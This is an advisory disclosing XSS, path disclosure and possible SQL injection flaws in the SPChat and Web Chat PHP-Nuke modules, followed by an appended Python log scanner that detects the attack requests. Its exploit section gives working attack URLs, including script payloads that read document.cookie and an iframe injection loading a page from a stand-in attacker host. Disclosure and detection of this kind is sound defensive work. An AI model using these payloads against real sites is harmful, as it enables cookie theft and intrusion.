~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
Vendor URL: http://www.saarport.net
Vuln Type: XSS (Cross Site Scripting), Path Disclosure, disclosure of the DB user name, possible SQL injection
Status: Vendor contacted. A patched version will be available shortly.
(http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
Author: XyborG (http://www.rzw.com.ar)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro:
~~~~~~
SPChat & WebChat are very good and stable online chat systems. But they have their faults :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Note: The name of the WebChat module can vary; I will use that name here.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:
~~~~~~~~~
The vendor has been contacted and a patched version will be available shortly.
As a temporary fix, remove this script from your site, or rename it so that
nobody can access it, and check the vendor's site for the new patch so that
you can continue using this service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
~~~~~~~~

Web Chat 2.0 for PHP-Nuke:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure (see the source code):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules/WebChat/out.php

----- Source Code -----
<br />
<b>Warning</b>: Access denied for user: 'victim@localhost' (Using password: YES) in <b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
</TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect failed<BR>
<B>MySQL error</B>: 0 ()<BR>
Session halted.
----- Source Code -----
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure:
~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure & disclosure of the DB user name & XSS, SQL Injection?:

http://www.victim.com/modules/WebChat/in.php
http://www.victim.com/modules/WebChat/quit.php
http://www.victim.com/modules/WebChat/users.php
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SPChat Ver. 0.8.0:
~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>

----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----
(Note: Replace '?' by '<')
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--
XyBOrG
WebMaster of: www.RZWEB.com.ar
Powered By Dattatec.Com
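
A log check for the request patterns listed in this advisory, as an added example that is not part of the original advisory or the vendor's code: it flags direct requests to the module's scripts, non-integer roomid/rid/uid values, and markup in username/statussess. The module directory names, the combined access-log format and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed names: the advisory notes the module directory name can vary.
MODULES = {"WebChat", "SPChat"}
DIRECT_FILES = {"out.php", "in.php", "quit.php", "users.php"}
INT_PARAMS = {"roomid", "rid", "uid"}        # expected to be plain integers
TEXT_PARAMS = {"username", "statussess"}     # reflected into the page
MARKUP = re.compile(r"[<>\"']")
# Request field of an Apache/Nginx "combined" log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the sorted advisory patterns a request target matches."""
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes
    parts = url.path.strip("/").split("/")
    direct = (len(parts) >= 3 and parts[-3] == "modules"
              and parts[-2] in MODULES and parts[-1] in DIRECT_FILES)
    via_loader = (parts[-1] == "modules.php"
                  and any(n in MODULES for n in params.get("name", [])))
    findings = {"direct-script-access"} if direct else set()
    if direct or via_loader:
        for key, values in params.items():
            for value in values:
                if key in INT_PARAMS and not re.fullmatch(r"[0-9]+", value):
                    findings.add("invalid-" + key)
                if key in TEXT_PARAMS and MARKUP.search(value):
                    findings.add("markup-in-" + key)
    return sorted(findings)

def scan(lines):
    """Yield (line_number, findings) for each log line that matches."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match and (hits := classify(match.group(1))):
            yield number, hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2003:10:00:00 +0000] "GET /modules.php?op=modload&name=WebChat&file=index&roomid=1 HTTP/1.0" 200 5120',
    '203.0.113.9 - - [01/Jan/2003:10:01:00 +0000] "GET /modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric HTTP/1.0" 200 812',
    '203.0.113.9 - - [01/Jan/2003:10:02:00 +0000] "GET /modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=%22%3E%3Cb%3E HTTP/1.0" 200 640',
    '203.0.113.9 - - [01/Jan/2003:10:03:00 +0000] "GET /modules.php?op=modload&name=SPChat&file=index&statussess=%3Ci%3E HTTP/1.0" 200 701',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE):
        print(number, ", ".join(hits))
```

Once the patched version is installed, the same check can be rerun against new logs to confirm that these requests no longer return error output.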